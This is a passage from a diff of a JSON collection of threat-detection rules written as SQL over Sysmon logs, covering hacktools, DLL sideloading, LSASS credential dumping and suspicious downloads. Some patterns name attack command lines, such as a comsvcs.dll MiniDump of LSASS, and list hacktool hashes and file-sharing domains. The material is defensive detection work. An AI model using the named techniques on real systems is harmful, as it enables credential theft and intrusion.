'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft 
(idea)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - 
"attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL 
side-loading attacks", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', 
'959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', 
'3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' 
ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", + "status": "experimental", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE 
'%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR 
(CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Trickbot 
Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Rare System Admin Activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + 
